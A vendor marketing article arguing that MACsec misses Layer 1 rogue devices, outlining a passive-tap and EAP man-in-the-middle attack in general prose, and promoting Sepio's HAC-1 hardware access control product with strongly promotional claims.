Macsec Is Your Silver Bullet? Think Again


Are you sure you’re safe?

Any form of cybersecurity is better than none at all. And the more cybersecurity measures in place, the better (be that software solutions, protocols, or practices). However, it is imperative to actually know the functions of such measures and how they protect you – or don’t. One of the greatest challenges we see in the cybersecurity world is knowing where the blind spots are. Often, cybersecurity efforts get implemented under the perception that they solve problems A, B, and C, when, in actuality, they only solve problems A and B. MACsec is one such example. While an undeniably valuable protocol, misconceptions surround the extent of protection that MACsec offers. As a result, organizations still face problem C, they just don’t know it – and that’s more dangerous than being knowingly exposed to it.

What is MACsec?

MACsec is a network security standard, widely deployed in PHYs, switches, firewalls, gateways and NICs, that provides Layer 2 security. The security protocol protects both network-to-network and device-to-network connections. MACsec provides point-to-point security through Layer 2 encryption between Ethernet-connected devices on a virtual or physical local area network (LAN); further, network administrators can inspect data in transit. In doing so, MACsec ensures the confidentiality, integrity, and authenticity of user data. Additionally, MACsec identifies unauthorized LAN connections and excludes them from connecting with the network. Authentication is enabled by Extensible Authentication Protocol (EAP) methods. By ensuring that a frame comes from the supplicant (i.e. device) that claims to have sent it, MACsec can mitigate attacks on Layer 2 protocols.

It sounds like MACsec is the solution to many of your network security woes. In addition to ensuring data protection, MACsec essentially acts as a bodyguard for your network, vetting connections to prevent any unwanted guests from getting inside. But, just as one might use a fake ID to bypass a bodyguard, attackers do the same to work around the MACsec protocol.

Meet: problem C

MACsec relies on authenticating supplicants through EAP methods. Yet, several EAP implementations are weak, allowing attackers to exploit the authentication process through a gateway attack and, subsequently, gain unauthorized network access. In a gateway attack, the perpetrator deploys a rogue device that initially acts as a passive tap. Passive taps lack a MAC  and IP address, allowing them to operate covertly (as the name suggests), simply sniffing network traffic. This, in itself, is a major cybersecurity threat, but attackers don’t always stop there. They want more; they want network access.

A simple switchboard application enables the passive tap to carry out more complex man-in-the-middle (MiTM) attacks. Instead of clandestine traffic sniffing, network traffic is rerouted directly to the rogue device. The supplicant, unknowingly, is forced to authenticate with the rogue device rather than directly to the switch (the authenticator). Now, the malicious actor can crack hashes and use stolen credentials to authenticate with the network directly. When connected to the switch, the rogue device spoofs the supplicant’s IP address, MAC address and cracked EAP credentials. Naturally, the connection is authenticated, and the attacker has direct access to the network.

Problem “See”

The underlying issue here is a gap in visibility. Organizations deem MACsec as a full proof network security protocol as it protects against unauthorized network devices. But this fails to take into consideration the devices that evade detection. MACsec operates on Layer 2, leaving Layer 1 exposed, a blind spot which the rogue device exploits by operating on this layer. Without Layer 1 data, MACsec cannot detect the rogue device, and, as a result, the switch thinks it is connecting to a legitimate, authorized supplicant.

Solving problem C – really!

Sepio has developed the HAC-1 solution to provide a panacea to the gap in device visibility. As the leader in Rogue Device Mitigation (RDM), Sepio’s solution, through Physical Layer (Layer 1) fingerprinting, identifies, detects, and handles all peripherals; no device goes unmanaged. In addition to gathering Layer 1 data, a comprehensive policy enforcement mechanism recommends on best practice policy and allows the administrator to define a strict, or more granular, set of rules for the system to enforce. More importantly, our solution detects and blocks attacks occurring through the Ethernet interface (passive taps, spoofing devices, unmanaged switches) and the USB interface (HID emulators, NIC manipulators). In doing so, HAC-1 goes deeper and lower than any other solution has gone before to provide Zero Trust Hardware Access, filling the gap where MACsec fails.

Sepio platform uses a novel algorithm, a combination of physical layer fingerprinting module coupled with a Machine Learning module – providing the sought-after visibility and enforcement level, it is further augmented by a threat intelligence database – ensuring a lower risk hardware infrastructure.

Hardware Assets Control solution for iot security

Sepio Hardware Access Control HAC-1, provides 100% hardware device visibility.

HAC-1 enables Hardware Access Control by setting rules based on the devices characteristics.

HAC-1 instantly detects any devices which breach the set rules and automatically block them to prevent malicious attacks.

The idea is to Verify and then Trust that those assets are what they say they are.

With greater visibility, the zero-trust architecture can grant access decisions with complete information.

Thus, enhancing the enterprise’s protection within, and outside of, its traditional perimeters.

The Hardware Access Control capabilities of HAC-1, block Rogue Devices as soon as they are detected

Our HAC-1 solution stops an attack at the first instance, not even allowing such devices to make network access requests.

Sepio Hardware Access Control HAC-1 provides 100% hardware device visibility. No device goes unmanaged. Rogue Devices are block as soon as they are detected. HAC-1 solution stops an attack at the first instance, not even allowing such devices to make network access requests.

Physical Layer Fingerprinting

Sepio is the only company in the world to undertake Physical Layer fingerprinting . HAC-1 detects and handles all peripherals; no device goes unmanaged.

With this total visibility, a stronger cyber security posture is achieved. There is no longer needed to rely on manual reporting or employee compliance. Sepio manage security and provides answers to questions such as:

  • Do we have an implant or spoofed device in our network?
  • How many IoT devices do we have?
  • Who are the top 5 vendors for devices found in our network?
  • Where are the most vulnerable switches in our network?

Having visibility across all hardware assets provides a more comprehensive cyber security defense.

Reduce the risk of a hardware attack being successful and our private health data being stolen.

Founded in 2016 by cybersecurity industry veterans from the Israeli Intelligence community, Sepio’s HAC-1 is the first hardware access control platform that provides visibility, control, and mitigation to zero trust, insider threat, BYOD, IT, OT and IoT security programs.

Sepio’s Technology

Sepio’s hardware fingerprinting technology discovers all managed, unmanaged and hidden devices that are otherwise invisible to all other security tools.

Sepio is a strategic partner of Munich Re, the world’s largest re-insurance company, and Merlin Cyber, a leading cybersecurity federal solution provider.

Heavy spending on cybersecurity should bring a high return on investment, yet gaps in visibility limit this.

HAC-1 fingerprinting technology

Sepio Hardware Access Control (HAC-1) solution provides a panacea to gaps in device visibility to ensure you are getting the most out of your cybersecurity investments.

HAC-1 integrates with existing solutions, such as NAC, EPS, SIEM and SOAR, to enhance the organization’s cybersecurity posture.

HAC-1’s deep visibility capabilities mean no device goes unmanaged; the solution identifies, detects, and handles all IT/OT/IoT devices.

Moreover, HAC-1’s policy enforcement mechanism and Rogue Device Mitigation capabilities instantly block any unapproved or rogue hardware.

In doing so, ultimately, HAC-1 enables a Zero Trust Hardware Access approach which stops attackers at the first line of defense.

Sepio supporting compliance

Sepio Systems’ Hardware Access Control (HAC-1) solution provides entities with the Physical Layer coverage they need to obtain complete device visibility. And, in doing so, also provides protection against hardware-based attacks.

As the leader in Rogue Device Mitigation (RDM), Sepio’s solution identifies, detects and handles all peripherals; no device goes unmanaged.

HAC-1 fingerprinting technology

HAC-1 uses Physical Layer fingerprinting technology and Machine Learning to calculate a digital fingerprint from the electrical characteristics of all devices and compares them against known fingerprints.

In doing so, HAC-1 is able to provide organizations with ultimate device visibility and detect vulnerable devices and switches within the infrastructure.

In addition to the deep visibility layer, a comprehensive policy enforcement mechanism recommends on best practice policy and allows the administrator to define a strict, or more granular, set of rules for the system to enforce.

When a device breaches the pre-set policy, HAC-1 automatically instigates a mitigation process that instantly blocks unapproved or Rogue hardware.

Furthermore, HAC-1’s RDM capabilities support compliance with Section 8 of the EO, which concerns the government’s investigative and remediation capabilities.

Section 8 focuses on enhancing data collection efforts in order to improve the investigation and remediation processes following an incident. HAC-1 logs all hardware asset information and usage and maintains such data for a period defined by the system administrator.

Leave a Reply